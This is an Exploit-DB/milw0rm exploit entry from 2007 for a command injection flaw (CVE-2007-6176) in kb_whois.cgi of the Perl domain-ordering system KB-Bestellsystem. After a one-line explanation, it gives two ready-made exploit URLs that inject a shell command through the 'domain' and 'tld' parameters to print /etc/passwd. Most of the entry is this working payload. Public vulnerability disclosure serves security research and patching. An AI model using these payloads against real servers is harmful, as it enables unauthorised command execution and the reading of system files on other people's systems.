KB-Bestellsystem (kb_whois.cgi) Command Execution Vulnerability
| EDB-ID: 4647 | CVE: 2007-6176 | OSVDB-ID: 40495 |
| Author: Zero X | Published: 2007-11-22 | Verified:  |
Exploit Code:  |
Vulnerable App: N/A |
Rating |
| EDB-ID: 4647 | CVE: 2007-6176 | OSVDB-ID: 40495 |
| Author: Zero X | Published: 2007-11-22 | Verified: |
| Exploit Code: |
Vulnerable App: N/A |
Rating |
"KB-Bestellsystem" is a domain order system written in Perl. The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters. The following examples will show you the /etc/passwd file: http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif= http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif= << Greetz Zero X >> # milw0rm.com [2007-11-22]